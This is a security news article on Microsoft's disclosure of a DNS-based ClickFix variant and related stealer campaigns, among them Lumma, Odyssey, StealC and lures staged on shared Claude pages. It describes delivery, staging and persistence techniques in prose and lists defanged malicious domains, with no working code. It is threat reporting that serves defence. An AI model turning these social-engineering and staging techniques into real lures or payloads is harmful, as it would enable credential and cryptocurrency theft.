Microsoft has disclosed details of a new version of the ClickFix social engineering tactic in which the attackers trick unsuspecting users into running commands that carry out a Domain Name System (DNS) lookup to retrieve the next-stage payload.
Specifically, the attack relies on using the “nslookup” (short for nameserver lookup) command to execute a custom DNS lookup triggered via the Windows Run dialog.
ClickFix is an increasingly popular technique that’s traditionally delivered via phishing, malvertising, or drive-by download schemes, often redirecting targets to bogus landing pages that host fake CAPTCHA verification or instructions to address a non-existent problem on their computers by running a command either through the Windows Run dialog or the macOS Terminal app.
The attack method has become widespread over the past two years since it hinges on the victims infecting their own machines with malware, thereby allowing the threat actors to bypass security controls. The effectiveness of ClickFix has been such that it has spawned several variants, such as FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.
“In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system’s default resolver,” the Microsoft Threat Intelligence team said in a series of posts on X. “The output is filtered to extract the `Name:` DNS response, which is executed as the second-stage payload.”
Microsoft said this new variation of ClickFix uses DNS as a “lightweight staging or signaling channel,” enabling the threat actor to reach infrastructure under their control, as well as erect a new validation layer before executing the second-stage payload.
“Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic,” the Windows maker added.
The downloaded payload subsequently initiates an attack chain that leads to the download of a ZIP archive from an external server (“azwsappdev[.]com”), from which a malicious Python script is extracted and run to conduct reconnaissance, run discovery commands, and drop a Visual Basic Script (VBScript) responsible for launching ModeloRAT, a Python-based remote access trojan previously distributed through CrashFix.
To establish persistence, a Windows shortcut (LNK) file pointing to the VBScript is created in the Windows Startup folder so that the malware is automatically launched every time the operating system is started.
The disclosure comes as Bitdefender warned of a surge in Lumma Stealer activity, driven by ClickFix-style fake CAPTCHA campaigns that deploy an AutoIt-version of CastleLoader, a malware loader associated with a threat actor codenamed GrayBravo (formerly TAG-150).
CastleLoader incorporates checks to determine the presence of virtualization software and specific security programs before decrypting and launching the stealer malware in memory. Outside of ClickFix, websites advertising cracked software and pirated movies serve as bait for CastleLoader-based attack chains, deceiving users into downloading rogue installers or executables masquerading as MP4 media files.
Other CastleLoader campaigns have also leveraged websites promising cracked software downloads as a starting point to distribute a fake NSIS installer that also runs obfuscated VBA scripts prior to running the AutoIt script that loads Lumma Stealer. The VBA loader is designed to run scheduled tasks responsible for ensuring persistence.
“Despite significant law enforcement disruption efforts in 2025, Lumma Stealer operations continued, demonstrating resilience by rapidly migrating to new hosting providers and adapting alternative loaders and delivery techniques,” the Romanian cybersecurity company said. “At the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer spread through delivery chains.”
Interestingly, one of the domains on CastleLoader’s infrastructure (“testdomain123123[.]shop”) was flagged as a Lumma Stealer command-and-control (C2), indicating that the operators of the two malware families are either working together or sharing service providers. The majority of Lumma Stealer infections have been recorded in India, followed by France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.
“The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities,” Bitdefender said. “The instructions resemble troubleshooting steps or verification workarounds that users may have encountered previously. As a result, victims often fail to recognize that they are manually executing arbitrary code on their own system.”
CastleLoader is not the only loader that’s being used to distribute Lumma Stealer. Campaigns observed as early as March 2025 have leveraged another loader dubbed RenEngine Loader, with the malware propagated under the guise of game cheats and pirated software like CorelDRAW graphics editor. In these attacks, the loader makes way for a secondary loader named Hijack Loader, which then deploys Lumma Stealer.
According to data from Kaspersky, RenEngine Loader attacks have primarily affected users in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France since March 2025.
The developments coincide with the emergence of various campaigns using social engineering lures, including ClickFix, to deliver a variety of stealers and malware loaders –
- A macOS campaign that has used phishing and malvertising ploys to deliver Odyssey Stealer, a rebrand of Poseidon Stealer, which itself is a fork of Atomic macOS Stealer (AMOS). The stealer exfiltrates credentials and data from 203 browser wallet extensions and 18 desktop wallet applications to facilitate cryptocurrency theft.
- “Beyond credential theft, Odyssey operates as a full remote access trojan,” Censys said. “A persistent LaunchDaemon polls the C2 every 60 seconds for commands, supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines.”
- A ClickFix attack chain targeting Windows systems that uses fake CAPTCHA verification pages on legitimate-but-compromised websites to trick users into executing PowerShell commands that deploy the StealC information stealer.
- An email phishing campaign that uses a malicious SVG file contained within a password‑protected ZIP archive to instruct the victim to run a PowerShell command using ClickFix, ultimately resulting in the deployment of an open-source .NET infostealer called Stealerium.
- A campaign that exploits the public sharing feature of generative artificial intelligence (AI) services like Anthropic Claude to stage malicious ClickFix instructions on how to perform a variety of tasks on macOS (e.g., “online DNS resolver”), and distribute these links via sponsored results on search engines like Google to deploy Atomic Stealer and MacSync Stealer.
- A campaign that directs users searching for “macOS cli disk space analyzer” to a fake Medium article impersonating Apple’s Support Team to deceive them into running ClickFix instructions that deliver next-stage stealer payloads from an external server “raxelpak[.]com.”
- “The C2 domain raxelpak[.]com has URL history going back to 2021, when it appeared to host a safety workwear e-commerce site,” MacPaw’s Moonlock Lab said. “Whether the domain was hijacked or simply expired and re-registered by the [threat actor] is unclear, but it fits the broader pattern of leveraging aged domains with existing reputation to avoid detection.”
- A variation of the same campaign that stages ClickFix instructions for supposedly installing Homebrew on links associated with Claude and Evernote through sponsored results to install stealer malware.
- “The ad shows a real, recognized domain (claude.ai), not a spoof or typo-squatted site,” AdGuard said. “Clicking the ad leads to a real Claude page, not a phishing copy. The consequence is clear: Google Ads + a well-known trusted platform + technical users with high downstream impact = a potent malware distribution vector.”
- A macOS email phishing campaign that prompts recipients to download and run an AppleScript file to address supposed compatibility issues, resulting in the deployment of another AppleScript designed to steal credentials and retrieve additional JavaScript payloads.
- “The malware does not grant permissions to itself; instead, it forges TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and bash) and then executes malicious actions through these binaries to inherit their permissions,” Darktrace said.
- A ClearFake campaign that employs fake CAPTCHA lures on compromised WordPress sites to trigger the execution of an HTML Application (HTA) file and deploy Lumma Stealer. The campaign is also known to use malicious JavaScript injections to take advantage of a technique known as EtherHiding to execute a contract hosted on the BNB Smart Chain and fetch an unknown payload hosted on GitHub.
- EtherHiding offers attackers several advantages, allowing malicious traffic to blend with legitimate Web3 activity. Because blockchain is immutable and decentralized, it offers increased resilience in the face of takedown efforts.
A recent analysis published by Flare has found that threat actors are increasingly targeting Apple macOS with infostealers and sophisticated tools.
“Nearly every macOS stealer prioritizes cryptocurrency theft above all else,” the company said. “This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse.”
“The ‘Macs don’t get viruses’ assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage.”
